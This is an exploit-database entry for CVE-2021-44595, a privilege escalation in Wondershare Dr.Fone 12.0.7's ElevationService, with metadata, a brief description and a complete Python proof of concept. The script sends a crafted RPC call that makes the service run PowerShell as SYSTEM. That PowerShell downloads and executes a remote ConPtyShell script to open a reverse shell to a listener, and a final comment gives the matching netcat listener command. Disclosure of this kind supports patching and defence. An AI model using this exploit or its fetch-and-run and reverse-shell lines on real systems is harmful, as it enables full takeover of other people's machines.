Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)

vendor:

Dr.Fone

by:

Netanel Cohen & Tomer Peled

8.8

CVSS

HIGH

Privilege Escalation

284

CWE

Product Name: Dr.Fone

Affected Version From: up to 12.0.7

Affected Version To: up to 12.0.7

Patch Exists: NO

Related CWE: CVE-2021-44595

CPE: a:wondershare:dr.fone:12.0.7

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2022

Wondershare Dr.Fone 12.0.7 – Privilege Escalation (ElevationService)

Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and execute arbitrary code without any validation with SYSTEM privileges.

Mitigation:

Patch/update the software to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell

#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.

#!/bin/python3
import msgpackrpc

LADDR = "192.168.14.129"
LPORT =  1338

RADDR = "192.168.14.137"
RPORT = 12345

param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)

# stty raw -echo; (stty size; cat) | nc -lvnp 1338